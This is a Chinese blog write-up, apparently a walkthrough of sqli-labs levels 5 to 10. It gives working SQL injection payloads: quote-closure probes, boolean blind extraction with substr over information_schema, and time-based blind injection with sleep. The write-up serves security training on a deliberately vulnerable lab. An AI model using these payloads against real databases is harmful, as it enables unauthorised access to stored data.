sqli-labs5到10

合集 - sqli-lab(10)
1.sqli-labs-1到4
2.sqli-labs5到10
3.sqli-lab 15到194.sqli-labs 11到14题5.sqli-labs 20到236.sqli-labs 24到267.sqli-labs 27到308.sqli-labs 32到409.sqli-labs 41到5010.upload-labs 1到21题通关详解
收起

第五关

 没有查询信息,盲注,妥妥的

 

?id=1'报错

?id=1'-- -不报错:闭合方式为'

接下来就是一个字母一个字母试了

首先判断库名的长度:?id=1' and length(database())=8-- -正确输出,长度为8

接下来爆出库名为security

 爆出库名爆表名:
?id=1'and  substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)= 'e'-- -

 那么有人问了,这么多写错了怎么办

好问题,可以先在你的datagrip上编辑,如果可以运行再复制过来

例如这样:

 接下来接着爆吧,不再演示。

第六关

换了个闭合方式:用”闭合,其余跟第五关一样

 第七关

id=1'报错且id=1"不报错,那闭合方式肯定跟 ' 有关了(而且以'开头)

接着id=1'-- -报错,肯定不是单引号闭合,后面还有东西:

id=1')-- -还报错...懂了,加两个 括号:搞定

 

and 1=2试试,直接说sql错误,盲注

 一样的套路

 第八关

闭合方式为'  其余一样

 第九关

上来有点懵,不管输入什么都是you are in ......

时间盲注试试

果然有反应

 接下来的操作跟之前相差不大:

表名字段名一条龙(不如sqlmap)

 ?id=1'and  substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)= 'e' and sleep(2)-- -

 第十题

依然是时间盲注:
闭合方式为"

这里查看闭合方式的方法为:
id=1' and sleep(2)-- -没有反应就换“ 再没有就接着换。

 

posted @   米斯特李  阅读(34)  评论(0编辑  收藏  举报
相关博文:
·  sqli-lab 15到19
·  sqli-labs-1到4
·  sqli-labs2-10
·  SQLI-LABS(Less-9、10)
·  SQL_lab总结1-10关
阅读排行:
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 25岁的心里话
· 按钮权限的设计及实现
点击右上角即可分享
微信分享提示
AI IDE Trae